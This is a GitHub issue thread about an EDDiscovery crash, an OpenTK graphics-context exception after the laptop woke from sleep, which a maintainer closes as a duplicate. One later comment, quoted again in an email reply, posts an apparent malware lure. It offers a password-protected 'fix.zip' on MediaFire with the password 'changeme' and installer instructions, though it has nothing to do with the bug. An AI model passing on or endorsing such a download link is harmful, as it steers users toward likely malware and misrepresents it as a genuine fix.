### ISSUE TITLE
Crashes with unhandled UI exception.

### ISSUE THREAD

**Issue by RocDoc1** [EDDiscovery/EDDiscovery#3557] opened 2024-08-28 03:31 UTC
### Description

Laptop was 'asleep' exception occurred when laptop woke.
Apps running EDDiscovery, EDEngineer, EDMC, ED 'play' screen, TCE Mk2
Restart EDDiscovery, all seems ok. 
Will provide more detail in due course.
### Exception Details:
>EDDiscovery v18.0.8.0 There was an unhandled UI exception.
>```
>==== BEGIN ====
>OpenTK.Graphics.GraphicsContextException: Failed to make context 65537 current. Error: 0
>   at OpenTK.Platform.Windows.WinGLContext.MakeCurrent(IWindowInfo window) in C:\Users\juliu\Documents\GitHub\opentk\src\OpenTK\Platform\Windows\WinGLContext.cs:line 279
>   at EDDiscovery.UserControls.UserControl3DMap.SystemTick(Object sender, EventArgs e) in C:\Code\EDDiscovery\EDDiscovery\UserControls\3DMap\UserControl3DMap.cs:line 111
>   at System.Windows.Forms.Timer.OnTick(EventArgs e)
>   at System.Windows.Forms.Timer.TimerNativeWindow.WndProc(Message& m)
>   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
>===== END =====
>```

**Comment by klightspeed** [comment] 2024-08-28 03:36
Duplicate of #3271

**Closed** 2024-08-28 03:43 UTC

**Comment by RocDoc1** [comment] 2024-08-28 04:00
Thanks Ben.My post now closed.🙄My excuse, very early morning.PaulSent from my Galaxy
-------- Original message --------From: Ben Peddell ***@***.***> Date: 28/08/2024  07:37  (GMT+04:00) To: EDDiscovery/EDDiscovery ***@***.***> Cc: RocDoc1 ***@***.***>, Author ***@***.***> Subject: Re: [EDDiscovery/EDDiscovery] Crashes with unhandled UI exception. (Issue #3557) 
Duplicate of #3271

**Comment by Gaurav9812** [comment] 2024-08-28 04:50
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RocDoc1** [comment] 2024-08-28 05:04
ThanksSent from my Galaxy
-------- Original message --------From: Gaurav Mehra ***@***.***> Date: 28/08/2024  08:50  (GMT+04:00) To: EDDiscovery/EDDiscovery ***@***.***> Cc: RocDoc1 ***@***.***>, State change ***@***.***> Subject: Re: [EDDiscovery/EDDiscovery] Crashes with unhandled UI exception. (Issue #3557) 
Download
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
